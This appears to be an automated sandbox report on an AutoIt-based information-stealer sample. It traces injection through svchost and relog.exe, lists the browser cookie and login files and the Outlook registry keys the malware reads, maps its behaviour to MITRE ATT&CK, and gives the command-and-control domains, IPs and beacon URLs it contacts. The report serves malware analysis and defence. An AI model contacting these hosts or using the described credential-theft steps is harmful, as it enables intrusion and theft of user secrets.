Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\relog.exe | Section loaded: NULL target: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe protection: read write
Source: C:\Windows\SysWOW64\relog.exe | Section loaded: NULL target: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\relog.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\relog.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\relog.exe | Thread register set: target process: 7808
Source: C:\Windows\SysWOW64\relog.exe | Thread APC queued: target process: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2BE6008
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005D2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005FB226 SendInput,keybd_event
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_006122DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BDlwy8b7Km.exe"
Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe | Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005F0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005F1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: BDlwy8b7Km.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: BDlwy8b7Km.exe, FKUPIibLrFYhJ.exe, 00000005.00000002.3559997147.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000000.1964352966.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560168658.0000000001210000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: FKUPIibLrFYhJ.exe, 00000005.00000002.3559997147.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000000.1964352966.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560168658.0000000001210000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: FKUPIibLrFYhJ.exe, 00000005.00000002.3559997147.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000000.1964352966.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560168658.0000000001210000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: FKUPIibLrFYhJ.exe, 00000005.00000002.3559997147.0000000000D80000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000005.00000000.1964352966.0000000000D81000.00000002.00000001.00040000.00000000.sdmp, FKUPIibLrFYhJ.exe, 00000007.00000002.3560168658.0000000001210000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B0698 cpuid
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00608195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005ED27A GetUserNameW
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005CBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

                Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2044978027.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3560373501.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\relog.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\relog.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\relog.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\relog.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\relog.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\relog.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\relog.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\relog.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\relog.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: BDlwy8b7Km.exe | Binary or memory string: WIN_81
Source: BDlwy8b7Km.exe | Binary or memory string: WIN_XP
Source: BDlwy8b7Km.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: BDlwy8b7Km.exe | Binary or memory string: WIN_XPe
Source: BDlwy8b7Km.exe | Binary or memory string: WIN_VISTA
Source: BDlwy8b7Km.exe | Binary or memory string: WIN_7
Source: BDlwy8b7Km.exe | Binary or memory string: WIN_8

                Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2044978027.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3560373501.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00611204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00611806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (techniques listed per tactic; a number in parentheses is the signature count shown next to that technique in the report, reproduced as extracted):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (12); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (241); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1588891, Sample: BDlwy8b7Km.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100

• Start node: DNS/IP: www.thinkone.xyz, www.givvjn.info, 5 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 4 other signatures. www.thinkone.xyz: Performs DNS queries to domains with low reputation.
• BDlwy8b7Km.exe (started from the start node; count shown in graph: 2). Signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures.
• svchost.exe (started by BDlwy8b7Km.exe). Signature: Maps a DLL or memory area into another process.
• FKUPIibLrFYhJ.exe (injected by svchost.exe). Signature: Found direct / indirect Syscall (likely to bypass EDR).
• relog.exe (started by FKUPIibLrFYhJ.exe; count shown in graph: 13). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures.
• FKUPIibLrFYhJ.exe (injected by relog.exe) and firefox.exe (started by relog.exe).
• FKUPIibLrFYhJ.exe (injected) network activity: www.givvjn.info 47.83.1.90, ports 49736, 49789, 49805, VODANETInternationalIP-BackboneofVodafoneDE, United States; www.gern.dev 185.151.30.223, ports 49882, 49899, 49915, TWENTYIGB, United Kingdom; 3 other IPs or domains. Signature: Found direct / indirect Syscall (likely to bypass EDR).
Source | Detection | Scanner | Label
BDlwy8b7Km.exe | 71% | ReversingLabs | Win32.Trojan.AutoItinject
BDlwy8b7Km.exe | 100% | Avira | HEUR/AGEN.1319493
BDlwy8b7Km.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://www.givvjn.info/wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN0 | 0% | Avira URL Cloud | safe
http://www.mraber.dev | 0% | Avira URL Cloud | safe
http://www.thinkone.xyz/b0aw/?TXVlY=nv6XU20pgPTDN0&94=VOu4tm+43rVZiGe5FbAiEYOvTb19T2jZsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLd6K3CAsSqZssuvcDLtxMQvu7+dmYX9caOt4= | 0% | Avira URL Cloud | safe
http://www.mraber.dev/ixqi/?94=TN9kbi/KmEXimVSL0ERanCo8EPrJiw0+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyN0TYvIjkiLeGXDgVU6Nef5fP7k6kFQJQYe0=&TXVlY=nv6XU20pgPTDN0 | 0% | Avira URL Cloud | safe
http://www.mraber.dev/ixqi/ | 0% | Avira URL Cloud | safe
http://www.newbh.pro/fpja/ | 0% | Avira URL Cloud | safe
http://www.givvjn.info/wl3x/ | 0% | Avira URL Cloud | safe
http://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&TXVlY=nv6XU20pgPTDN0 | 0% | Avira URL Cloud | safe
http://www.thinkone.xyz/b0aw/ | 0% | Avira URL Cloud | safe
http://www.linkdex.com/bots/) | 0% | Avira URL Cloud | safe
https://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo | 0% | Avira URL Cloud | safe
http://www.gern.dev/xbnt/?94=rqIPJyQOuOJXv4fam5ihbRMSLxb0TSwIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlVDgekBEOU7d1VgzmTDcFpkSUd31giEOekxs=&TXVlY=nv6XU20pgPTDN0 | 0% | Avira URL Cloud | safe
http://www.gern.dev/xbnt/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.aoivej.info | 47.83.1.90 | true | true | | unknown
www.newbh.pro | 176.57.65.76 | true | false | | high
mraber.dev | 46.38.243.234 | true | true | | unknown
www.gern.dev | 185.151.30.223 | true | true | | unknown
www.givvjn.info | 47.83.1.90 | true | true | | unknown
www.thinkone.xyz | 209.74.79.41 | true | true | | unknown
www.mraber.dev | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.newbh.pro/fpja/ | true | Avira URL Cloud: safe | unknown
http://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXOgpd68BkSHP+aMLU3EdNDzM0cA8Rv+lzAIQ=&TXVlY=nv6XU20pgPTDN0 | true | Avira URL Cloud: safe | unknown
http://www.thinkone.xyz/b0aw/?TXVlY=nv6XU20pgPTDN0&94=VOu4tm+43rVZiGe5FbAiEYOvTb19T2jZsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLd6K3CAsSqZssuvcDLtxMQvu7+dmYX9caOt4= | true | Avira URL Cloud: safe | unknown
http://www.thinkone.xyz/b0aw/ | true | Avira URL Cloud: safe | unknown
http://www.givvjn.info/wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN0 | true | Avira URL Cloud: safe | unknown
http://www.givvjn.info/wl3x/ | true | Avira URL Cloud: safe | unknown
http://www.mraber.dev/ixqi/?94=TN9kbi/KmEXimVSL0ERanCo8EPrJiw0+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyN0TYvIjkiLeGXDgVU6Nef5fP7k6kFQJQYe0=&TXVlY=nv6XU20pgPTDN0 | true | Avira URL Cloud: safe | unknown
http://www.mraber.dev/ixqi/ | true | Avira URL Cloud: safe | unknown
http://www.gern.dev/xbnt/?94=rqIPJyQOuOJXv4fam5ihbRMSLxb0TSwIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlVDgekBEOU7d1VgzmTDcFpkSUd31giEOekxs=&TXVlY=nv6XU20pgPTDN0 | true | Avira URL Cloud: safe | unknown
http://www.gern.dev/xbnt/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.mraber.dev | FKUPIibLrFYhJ.exe, 00000007.00000002.3561922988.00000000050D4000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.linkdex.com/bots/) | firefox.exe, 00000008.00000002.2345513606.0000021D37B2D000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo | FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.00000000034EA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.57.65.76 | www.newbh.pro | Bosnia and Herzegowina | 47959 | TELINEABA | false
47.83.1.90 | www.aoivej.info | United States | 3209 | VODANETInternationalIP-BackboneofVodafoneDE | true
209.74.79.41 | www.thinkone.xyz | United States | 31744 | MULTIBAND-NEWHOPEUS | true
185.151.30.223 | www.gern.dev | United Kingdom | 48254 | TWENTYIGB | true
46.38.243.234 | mraber.dev | Germany | 197540 | NETCUP-ASnetcupGmbHDE | true
                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1588891
                                                Start date and time:2025-01-11 06:53:45 +01:00
